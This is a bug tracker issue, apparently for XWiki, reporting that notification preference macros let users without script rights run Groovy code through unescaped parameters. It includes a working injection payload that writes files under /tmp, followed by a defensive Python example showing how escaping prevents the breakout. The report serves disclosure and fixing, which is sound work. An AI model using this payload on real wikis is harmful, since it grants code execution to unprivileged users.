Details
- Bug
- Resolution: Fixed
- Blocker
- 13.2-rc-1
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
Add
{{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}} {{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}} {{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
to any place where you can use wiki syntax, such as the "about" section in your user profile, as a user without programming or script rights.
Expected result:
No file is created.
Actual result:
A file /tmp/exploit.txt is created with content "created from filter preferences!". Similar files are created for the other macros. This shows a privilege escalation to programming rights. The attack can be executed with just an account that has write access to the user profile, or even with only view rights via CKEditor's HTML converter.
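The root cause described above is that a user-controlled value is placed into a macro parameter without escaping, so a value containing an unescaped quote and `/}}` terminates the parameter and the macro and the rest of the value is parsed as new macro invocations. The following is an added example, not code from XWiki or from this issue: it models a minimal macro parameter parser in which `~` escapes the following character (the assumed XWiki 2.x escaping rule), builds the same macro markup with and without escaping the untrusted value, and shows that only the escaped form keeps the whole value inside the parameter. The macro name, the parser and the `injected` placeholder macro in the sample value are all constructed for the example.

```python
# Added example: escaping untrusted text before embedding it in a wiki macro parameter.
# Assumption: "~" escapes the next character inside a double-quoted parameter value
# (a simplified model of XWiki 2.x syntax; not XWiki's own parser).
ESCAPE = "~"


def escape_macro_parameter(value: str) -> str:
    """Escape '~' as '~~' and '"' as '~"' so that, once the parser removes one
    escaping level, the value is reproduced literally and cannot close the
    quoted parameter or the enclosing macro."""
    return "".join(ESCAPE + c if c in (ESCAPE, '"') else c for c in value)


def read_quoted_value(text: str, pos: int) -> tuple[str, int]:
    """Model of a parameter parser: `pos` is just after the opening quote.
    '~' escapes the following character; the first unescaped '"' ends the value.
    Returns (decoded value, index just past the closing quote)."""
    out = []
    i = pos
    while i < len(text):
        c = text[i]
        if c == ESCAPE and i + 1 < len(text):
            out.append(text[i + 1])  # keep the escaped character literally
            i += 2
            continue
        if c == '"':
            return "".join(out), i + 1
        out.append(c)
        i += 1
    raise ValueError("unterminated parameter value")


def render_macro(name: str, user: str, escape: bool) -> str:
    """Build '{{name user="..."/}}' from an untrusted `user` value.
    escape=False is the vulnerable pattern; escape=True is the hardened one."""
    value = escape_macro_parameter(user) if escape else user
    return "{{" + name + ' user="' + value + '"/}}'


def parse_single_macro(markup: str) -> tuple[str, str]:
    """Parse the first '{{name user="..."/}}' and return (user value, trailing markup).
    Trailing markup is whatever the parser would go on to interpret after the
    macro; for a correctly escaped value it must be empty."""
    start = markup.index('user="') + len('user="')
    value, i = read_quoted_value(markup, start)
    while i < len(markup) and markup[i] == " ":
        i += 1
    if not markup.startswith("/}}", i):
        raise ValueError("expected end of macro after parameter")
    return value, markup[i + 3:]


# Constructed sample value in the shape of the report's payload: an unescaped
# quote closes the parameter, "/}}" closes the macro, then a new macro follows.
INJECTED = '" /}} {{injected/}} "/'


def demonstrate() -> dict:
    """Return parse results for the vulnerable and hardened renderings."""
    v_value, v_tail = parse_single_macro(render_macro("notificationsFiltersPreferences", INJECTED, escape=False))
    h_value, h_tail = parse_single_macro(render_macro("notificationsFiltersPreferences", INJECTED, escape=True))
    return {
        "vulnerable_value": v_value,   # empty: the leading quote closed the parameter
        "vulnerable_tail": v_tail,     # contains "{{injected/}}": parsed as a new macro
        "hardened_value": h_value,     # the full original string, kept inside the parameter
        "hardened_tail": h_tail,       # empty: nothing leaks out of the macro
    }


if __name__ == "__main__":
    for key, val in demonstrate().items():
        print(f"{key}: {val!r}")
```

The check that matters in the hardened case is that the trailing markup is empty and the decoded value round-trips to the original string; any code path that re-embeds a user-supplied value into generated wiki syntax should satisfy both.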
Attachments
Issue Links
- is caused by XWIKI-16158 Allow admin to access the notification preferences of other users (Closed)